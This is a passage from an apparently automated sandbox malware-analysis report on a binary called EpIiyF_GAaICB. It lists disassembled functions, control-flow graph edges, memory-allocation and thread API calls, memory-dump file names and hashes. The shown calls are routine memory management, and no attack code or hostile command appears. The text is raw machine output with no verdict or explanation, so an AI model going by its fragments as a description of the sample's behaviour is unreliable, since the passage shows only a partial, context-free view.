                                                  • VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55DD8
                                                  • GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55DE2
                                                  • Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55DFC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AllocErrorLastSleepVirtual
                                                  • String ID:
                                                  • API String ID: 2288223010-0
                                                  • Opcode ID: d524ca6a0605911d8b40cca043998a5ba1e2f139df4df074abf9eb08c0d64b0f
                                                  • Instruction ID: 27941834120aa8a2b3677ffee61b4268e0c0b6ceca14f2f9cd473e8d7c8be2da
                                                  • Opcode Fuzzy Hash: d524ca6a0605911d8b40cca043998a5ba1e2f139df4df074abf9eb08c0d64b0f
                                                  • Instruction Fuzzy Hash: F1513C30201606EBCF224B61ED6EAAE3B69EF45367F54421AFD0AC4174D7B19A44CF71
                                                  Function 00D55E10 Relevance: 10.2, APIs: 8, Instructions: 210COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 453 d55e10-d55e25 VirtualFree 454 d55e27-d55e32 453->454 455 d55e33-d55e4a 453->455 456 d55ebd-d55ebe 455->456 457 d55e4c-d55e57 455->457 458 d55ec0-d55ec3 456->458 459 d56077-d5607c 457->459 460 d56136 457->460 461 d56216-d5621b 457->461 462 d55e71-d55e79 call d55ba0 457->462 463 d56090-d560a2 call d55ba0 457->463 464 d56070-d56075 457->464 465 d5621d 457->465 466 d55e9f-d55eae VirtualFree 457->466 467 d55e5e-d55e63 457->467 468 d5607e-d56083 457->468 469 d5613b-d56151 call d55ba0 457->469 470 d55e65-d55e6a 457->470 471 d56121-d56126 457->471 472 d56063-d56068 457->472 473 d56222-d56232 call d55ba0 457->473 474 d55e6c 457->474 475 d5612f-d56134 457->475 476 d5620f-d56214 457->476 477 d56128-d5612d 457->477 478 d56208-d5620d 457->478 484 d55ff0-d56001 call d56100 458->484 459->463 460->469 461->473 486 d55e7e-d55e83 462->486 494 d560a4-d560b3 GetLastError 463->494 495 d560bc-d560bf 463->495 464->463 465->473 482 d55eb0-d55eb8 GetLastError 466->482 483 d55eba-d55ebc 466->483 467->462 468->463 489 d56156-d5615b 469->489 470->462 471->469 472->463 492 d5615f-d56166 473->492 493 d56238-d56244 GetLastError 473->493 474->462 475->469 476->473 477->469 478->473 482->458 482->483 504 d56007-d56028 484->504 505 d560c8-d560d1 484->505 486->483 491 d55e85-d55e90 GetLastError 486->491 496 d5615d 489->496 497 d56168-d5617e GetLastError 489->497 499 d55e92-d55e93 call d45050 491->499 500 d55e98-d55e9a 491->500 501 d56180-d56189 492->501 493->501 494->484 503 d560c6 495->503 496->492 497->501 502 d5618a-d56197 TryAcquireSRWLockExclusive 497->502 499->500 500->483 507 d55e9c-d55e9d 500->507 508 d561a3-d561ad 502->508 509 d56199-d5619e call d3c4b0 502->509 503->505 504->503 510 d5602e-d5603e VirtualFree 504->510 507->466 514 d561e6-d561f7 ReleaseSRWLockExclusive 508->514 515 d561af-d561c5 VirtualFree 508->515 509->508 511 d56044-d56051 510->511 512 d560d2-d560d3 510->512 516 d560d5-d560f4 call d55ed0 511->516 517 d56057-d5605c 511->517 512->516 518 d5624c-d5624d 514->518 519 d561f9-d56201 514->519 520 d5624f-d56252 515->520 521 d561cb-d561dc 515->521 558 d560f9-d560fd 516->558 517->459 517->460 517->461 517->463 517->464 517->465 517->468 517->469 517->471 517->472 517->473 517->475 517->476 517->477 517->478 523 d562be-d562c3 517->523 524 d562db 517->524 525 d562c5-d562ca 517->525 526 d562e0-d562ed call d55ba0 517->526 527 d562cc-d562d9 VirtualFree 517->527 518->520 519->461 519->465 519->473 519->476 519->478 519->523 519->524 519->525 519->526 519->527 528 d56595-d5659d 519->528 529 d565d5-d565dc 519->529 530 d56577-d5657e 519->530 531 d565bd-d565c4 519->531 532 d565e7-d565f2 519->532 533 d565e1-d565e5 519->533 534 d565c9-d565d0 519->534 520->523 521->514 523->526 524->526 525->526 535 d562f0-d562f7 526->535 527->535 537 d56616-d56621 call d3ea2c 528->537 538 d5659f-d565a5 528->538 536 d56663-d56685 call d0046c 529->536 530->536 531->536 532->536 541 d56656-d56660 call cffc01 533->541 534->536 559 d5668b-d566aa call d61fe6 536->559 560 d5655a-d5655e 536->560 549 d56624-d56626 537->549 546 d566c3-d566cf 538->546 547 d565ab-d565bb 538->547 541->536 550 d566d4-d56755 call cedf3c call cffd4e call d56758 call cffda8 call cffd66 call d61fe6 546->550 547->549 556 d566ad-d566c1 549->556 557 d5662c-d56642 call cffc01 549->557 556->550 557->536 561 d56567-d5656e 560->561 562 d56560-d56564 560->562 568 d56570 561->568 569 d56583-d56590 call cff8c8 561->569 562->561 568->528 568->529 568->530 568->531 568->532 568->533 568->534 571 d565f4-d565fa 568->571 569->528 569->536 575 d56644-d5664b call d3ea2c 571->575 576 d565fc-d565fe 571->576 583 d5664e-d56650 575->583 576->546 580 d56604-d56614 576->580 580->583 583->556 584 d56652-d56655 583->584 584->541
                                                  APIs
                                                  • VirtualFree.KERNEL32(-00000100,00000000,00008000,?,00D55A2E,?,?,?,00D54E02,00000002,00000000,-00000100,?,00000000,-00000100,00000000), ref: 00D55E1D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 8f7aedef26dd77dfc0c7d119b53c1e25954d37b25875af57d1afc62d7969ebd4
                                                  • Instruction ID: 6857f854b5364372805b1fac2b6ab63c4c5f073a5f2e173079a21595776da4d3
                                                  • Opcode Fuzzy Hash: 8f7aedef26dd77dfc0c7d119b53c1e25954d37b25875af57d1afc62d7969ebd4
                                                  • Instruction Fuzzy Hash: 22511271B00604ABFF145A78EC16B7B3359DB40353F944429FE0AD7285EA39DC4947B5
                                                  Function 00D56100 Relevance: 9.2, APIs: 6, Instructions: 207COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 706 d56100-d5610f 707 d56115-d5611a 706->707 708 d56249-d5624a 706->708 710 d56136 707->710 711 d56216-d5621b 707->711 712 d5621d 707->712 713 d562be-d562c3 707->713 714 d5613b-d56151 call d55ba0 707->714 715 d562db 707->715 716 d562c5-d562ca 707->716 717 d56121-d56126 707->717 718 d562e0-d562ed call d55ba0 707->718 719 d56222-d56232 call d55ba0 707->719 720 d562cc-d562d9 VirtualFree 707->720 721 d5612f-d56134 707->721 722 d5620f-d56214 707->722 723 d56128-d5612d 707->723 724 d56208-d5620d 707->724 709 d5624c-d5624d 708->709 726 d5624f-d56252 709->726 710->714 711->719 712->719 713->718 731 d56156-d5615b 714->731 715->718 716->718 717->714 727 d562f0-d562f7 718->727 733 d5615f-d56166 719->733 734 d56238-d56244 GetLastError 719->734 720->727 721->714 722->719 723->714 724->719 726->713 735 d5615d 731->735 736 d56168-d5617e GetLastError 731->736 737 d56180-d56189 733->737 734->737 735->733 736->737 738 d5618a-d56197 TryAcquireSRWLockExclusive 736->738 739 d561a3-d561ad 738->739 740 d56199-d5619e call d3c4b0 738->740 742 d561e6-d561f7 ReleaseSRWLockExclusive 739->742 743 d561af-d561c5 VirtualFree 739->743 740->739 742->709 744 d561f9-d56201 742->744 743->726 745 d561cb-d561dc 743->745 744->711 744->712 744->713 744->715 744->716 744->718 744->719 744->720 744->722 744->724 746 d56595-d5659d 744->746 747 d565d5-d565dc 744->747 748 d56577-d5657e 744->748 749 d565bd-d565c4 744->749 750 d565e7-d565f2 744->750 751 d565e1-d565e5 744->751 752 d565c9-d565d0 744->752 745->742 754 d56616-d56621 call d3ea2c 746->754 755 d5659f-d565a5 746->755 753 d56663-d56685 call d0046c 747->753 748->753 749->753 750->753 756 d56656-d56660 call cffc01 751->756 752->753 770 d5668b-d566aa call d61fe6 753->770 771 d5655a-d5655e 753->771 762 d56624-d56626 754->762 760 d566c3-d566cf 755->760 761 d565ab-d565bb 755->761 756->753 763 d566d4-d56755 call cedf3c call cffd4e call d56758 call cffda8 call cffd66 call d61fe6 760->763 761->762 768 d566ad-d566c1 762->768 769 d5662c-d56642 call cffc01 762->769 768->763 769->753 772 d56567-d5656e 771->772 773 d56560-d56564 771->773 779 d56570 772->779 780 d56583-d56590 call cff8c8 772->780 773->772 779->746 779->747 779->748 779->749 779->750 779->751 779->752 782 d565f4-d565fa 779->782 780->746 780->753 786 d56644-d5664b call d3ea2c 782->786 787 d565fc-d565fe 782->787 794 d5664e-d56650 786->794 787->760 791 d56604-d56614 787->791 791->794 794->768 795 d56652-d56655 794->795 795->756
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,?,00D55F0C,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D5616B
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DD308C,?,?,?,?,00D55F0C,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D5618F
                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00D55F0C,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D561BD
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DD308C,?,?,?,?,00D55F0C,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D561EB
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00D55F0C,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D56238
                                                  • VirtualFree.KERNEL32(00000000,00000002,00004000,?,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?,?,?,000C7D80,000C7DC0,?), ref: 00D562D3
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DD308C,00000001,?,?,?,00D2784E), ref: 00D5630B
                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00D2784E), ref: 00D56337
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DD308C,?,?,?,00D2784E), ref: 00D56366
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$FreeVirtual$AcquireErrorLastRelease
                                                  • String ID:
                                                  • API String ID: 229444167-0
                                                  • Opcode ID: 49b63e9e7fd050bcff7054ae8423b7ea46b78940b4a9dc091f2bf1057672586c
                                                  • Instruction ID: 22021b69446d7ec45f9798a4e7a266c3a17434f8a7ea59a7d9a24602484eca19
                                                  • Opcode Fuzzy Hash: 49b63e9e7fd050bcff7054ae8423b7ea46b78940b4a9dc091f2bf1057672586c
                                                  • Instruction Fuzzy Hash: EF51D171A04304DBDB109F64EC45B7AB3A4FB84312F94492AFE8AD7340E734E9098B75
                                                  Function 00D55ED0 Relevance: 7.8, APIs: 6, Instructions: 250COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1110 d55ed0-d55ee8 1111 d55efa-d55f13 call d56100 1110->1111 1112 d55eea-d55eec call d5f780 1110->1112 1117 d55f15-d55f1c 1111->1117 1118 d55f47-d55f4f 1111->1118 1115 d55ef1-d55ef7 1112->1115 1115->1111 1121 d55f22-d55f32 VirtualFree 1117->1121 1122 d560c8-d560d1 1117->1122 1119 d55f55-d55f72 call d56100 1118->1119 1120 d560b8-d560ba 1118->1120 1129 d55fa5-d55faa 1119->1129 1130 d55f74-d55f7d 1119->1130 1120->1122 1123 d560d8-d560d9 1121->1123 1124 d55f38-d55f45 1121->1124 1126 d560db-d560f4 call d55ed0 1123->1126 1124->1119 1134 d560f9-d560fd 1126->1134 1129->1120 1133 d55fb0-d55fbe 1129->1133 1130->1122 1132 d55f83-d55f93 VirtualFree 1130->1132 1132->1123 1135 d55f99-d55fa3 1132->1135 1133->1126 1136 d55fc4-d55fe1 1133->1136 1135->1133 1137 d55ff0-d56001 call d56100 1136->1137 1137->1122 1140 d56007-d56028 1137->1140 1141 d560c6 1140->1141 1142 d5602e-d5603e VirtualFree 1140->1142 1141->1122 1143 d56044-d56051 1142->1143 1144 d560d2-d560d3 1142->1144 1145 d560d5-d560d6 1143->1145 1146 d56057-d5605c 1143->1146 1144->1145 1145->1123 1147 d56077-d5607c 1146->1147 1148 d56136 1146->1148 1149 d56216-d5621b 1146->1149 1150 d56090-d560a2 call d55ba0 1146->1150 1151 d56070-d56075 1146->1151 1152 d5621d 1146->1152 1153 d5607e-d56083 1146->1153 1154 d562be-d562c3 1146->1154 1155 d5613b-d56151 call d55ba0 1146->1155 1156 d562db 1146->1156 1157 d562c5-d562ca 1146->1157 1158 d56121-d56126 1146->1158 1159 d562e0-d562ed call d55ba0 1146->1159 1160 d56063-d56068 1146->1160 1161 d56222-d56232 call d55ba0 1146->1161 1162 d562cc-d562d9 VirtualFree 1146->1162 1163 d5612f-d56134 1146->1163 1164 d5620f-d56214 1146->1164 1165 d56128-d5612d 1146->1165 1166 d56208-d5620d 1146->1166 1147->1150 1148->1155 1149->1161 1178 d560a4-d560b3 GetLastError 1150->1178 1179 d560bc-d560bf 1150->1179 1151->1150 1152->1161 1153->1150 1154->1159 1174 d56156-d5615b 1155->1174 1156->1159 1157->1159 1158->1155 1169 d562f0-d562f7 1159->1169 1160->1150 1176 d5615f-d56166 1161->1176 1177 d56238-d56244 GetLastError 1161->1177 1162->1169 1163->1155 1164->1161 1165->1155 1166->1161 1180 d5615d 1174->1180 1181 d56168-d5617e GetLastError 1174->1181 1182 d56180-d56189 1176->1182 1177->1182 1178->1137 1179->1141 1180->1176 1181->1182 1183 d5618a-d56197 TryAcquireSRWLockExclusive 1181->1183 1184 d561a3-d561ad 1183->1184 1185 d56199-d5619e call d3c4b0 1183->1185 1187 d561e6-d561f7 ReleaseSRWLockExclusive 1184->1187 1188 d561af-d561c5 VirtualFree 1184->1188 1185->1184 1189 d5624c-d5624d 1187->1189 1190 d561f9-d56201 1187->1190 1191 d5624f-d56252 1188->1191 1192 d561cb-d561dc 1188->1192 1189->1191 1190->1149 1190->1152 1190->1154 1190->1156 1190->1157 1190->1159 1190->1161 1190->1162 1190->1164 1190->1166 1193 d56595-d5659d 1190->1193 1194 d565d5-d565dc 1190->1194 1195 d56577-d5657e 1190->1195 1196 d565bd-d565c4 1190->1196 1197 d565e7-d565f2 1190->1197 1198 d565e1-d565e5 1190->1198 1199 d565c9-d565d0 1190->1199 1191->1154 1192->1187 1201 d56616-d56621 call d3ea2c 1193->1201 1202 d5659f-d565a5 1193->1202 1200 d56663-d56685 call d0046c 1194->1200 1195->1200 1196->1200 1197->1200 1203 d56656-d56660 call cffc01 1198->1203 1199->1200 1217 d5668b-d566aa call d61fe6 1200->1217 1218 d5655a-d5655e 1200->1218 1209 d56624-d56626 1201->1209 1207 d566c3-d566cf 1202->1207 1208 d565ab-d565bb 1202->1208 1203->1200 1210 d566d4-d56755 call cedf3c call cffd4e call d56758 call cffda8 call cffd66 call d61fe6 1207->1210 1208->1209 1215 d566ad-d566c1 1209->1215 1216 d5662c-d56642 call cffc01 1209->1216 1215->1210 1216->1200 1219 d56567-d5656e 1218->1219 1220 d56560-d56564 1218->1220 1226 d56570 1219->1226 1227 d56583-d56590 call cff8c8 1219->1227 1220->1219 1226->1193 1226->1194 1226->1195 1226->1196 1226->1197 1226->1198 1226->1199 1229 d565f4-d565fa 1226->1229 1227->1193 1227->1200 1233 d56644-d5664b call d3ea2c 1229->1233 1234 d565fc-d565fe 1229->1234 1241 d5664e-d56650 1233->1241 1234->1207 1238 d56604-d56614 1234->1238 1238->1241 1241->1215 1242 d56652-d56655 1241->1242 1242->1203
                                                  APIs
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D55F2A
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000,?,-00000100,?,00000000), ref: 00D55F8B
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D560A4
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D56036
                                                    • Part of subcall function 00D55BA0: VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55BBB
                                                    • Part of subcall function 00D55BA0: GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55BE8
                                                    • Part of subcall function 00D55BA0: Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C06
                                                    • Part of subcall function 00D55BA0: VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55C14
                                                    • Part of subcall function 00D55BA0: GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C22
                                                    • Part of subcall function 00D55BA0: Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C40
                                                    • Part of subcall function 00D55BA0: VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55C4E
                                                    • Part of subcall function 00D55BA0: GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C5C
                                                    • Part of subcall function 00D55BA0: Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C7A
                                                    • Part of subcall function 00D55BA0: VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55C88
                                                    • Part of subcall function 00D55BA0: GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55C96
                                                    • Part of subcall function 00D55BA0: Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55CB4
                                                    • Part of subcall function 00D55BA0: VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55CC2
                                                    • Part of subcall function 00D55BA0: GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55CD0
                                                    • Part of subcall function 00D55BA0: Sleep.KERNEL32(00000032,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55CEE
                                                    • Part of subcall function 00D55BA0: VirtualAlloc.KERNEL32(00000000,00000002,00000002,000C7D80,?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002), ref: 00D55CFC
                                                    • Part of subcall function 00D55BA0: GetLastError.KERNEL32(?,?,00000002,?,00D562ED,00000000,?,00001000,?,00D3E5F4,000C7D80,00000002,00000002,00000000,?), ref: 00D55D0A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Virtual$ErrorLast$Alloc$Sleep$Free
                                                  • String ID:
                                                  • API String ID: 2167363077-0
                                                  • Opcode ID: cf2dd6bb421a15eb1a40dfe590b7d20ad0e9baf902db62a7be42bf7ec843a0c6
                                                  • Instruction ID: aa4b6d67e50265dd632d1c38ee61ffb2f0198e1eb9c329ecd35b3843b57a56f2
                                                  • Opcode Fuzzy Hash: cf2dd6bb421a15eb1a40dfe590b7d20ad0e9baf902db62a7be42bf7ec843a0c6
                                                  • Instruction Fuzzy Hash: A471D071B006099BEF109E68EC81B7A77A5EB84352F984039FD09DB391EA31DD0987B5
                                                  Function 070F9CC9 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1248 70f9cc9-70f9cd6 1249 70f9cdd-70f9d67 GetCurrentProcess 1248->1249 1250 70f9cd8-70f9cdc 1248->1250 1254 70f9d69-70f9d6f 1249->1254 1255 70f9d70-70f9da4 GetCurrentThread 1249->1255 1250->1249 1254->1255 1256 70f9dad-70f9de1 GetCurrentProcess 1255->1256 1257 70f9da6-70f9dac 1255->1257 1259 70f9dea-70f9e05 call 70fa2b0 1256->1259 1260 70f9de3-70f9de9 1256->1260 1257->1256 1263 70f9e0b-70f9e3a GetCurrentThreadId 1259->1263 1260->1259 1264 70f9e3c-70f9e42 1263->1264 1265 70f9e43-70f9ea5 1263->1265 1264->1265
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 070F9D56
                                                  • GetCurrentThread.KERNEL32 ref: 070F9D93
                                                  • GetCurrentProcess.KERNEL32 ref: 070F9DD0
                                                  • GetCurrentThreadId.KERNEL32 ref: 070F9E29
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447776421.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_70f0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 1621e44433a70c4f3fa42c102744040f388cc0f78b85b6b1e892d21cffd5fd95
                                                  • Instruction ID: 590fbcfc7c07dc3200d9d2dd8b4ffd808b422486a17bd67dc0319f4e3db7dfb2
                                                  • Opcode Fuzzy Hash: 1621e44433a70c4f3fa42c102744040f388cc0f78b85b6b1e892d21cffd5fd95
                                                  • Instruction Fuzzy Hash: 565186B0D107098FDB54CFA9D548B9EBBF1EB48314F208569E409A7260CB746984CF62
                                                  Function 070F9CD8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1272 70f9cd8-70f9d67 GetCurrentProcess 1277 70f9d69-70f9d6f 1272->1277 1278 70f9d70-70f9da4 GetCurrentThread 1272->1278 1277->1278 1279 70f9dad-70f9de1 GetCurrentProcess 1278->1279 1280 70f9da6-70f9dac 1278->1280 1282 70f9dea-70f9e05 call 70fa2b0 1279->1282 1283 70f9de3-70f9de9 1279->1283 1280->1279 1286 70f9e0b-70f9e3a GetCurrentThreadId 1282->1286 1283->1282 1287 70f9e3c-70f9e42 1286->1287 1288 70f9e43-70f9ea5 1286->1288 1287->1288
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 070F9D56
                                                  • GetCurrentThread.KERNEL32 ref: 070F9D93
                                                  • GetCurrentProcess.KERNEL32 ref: 070F9DD0
                                                  • GetCurrentThreadId.KERNEL32 ref: 070F9E29
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447776421.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_70f0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 1a1d95635dd061244be58d233c79da3dac34092c83d9af2ebee89a4a6ea0c651
                                                  • Instruction ID: 9635bca8d80221a03363f599354ef572bf95aa0601e32ea10665da5149b6562d
                                                  • Opcode Fuzzy Hash: 1a1d95635dd061244be58d233c79da3dac34092c83d9af2ebee89a4a6ea0c651
                                                  • Instruction Fuzzy Hash: 685165B0D107098FDB54DFAAD548B9EBBF1EB88314F20C559E409A7260CB746984CB65
                                                  Function 00D61730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
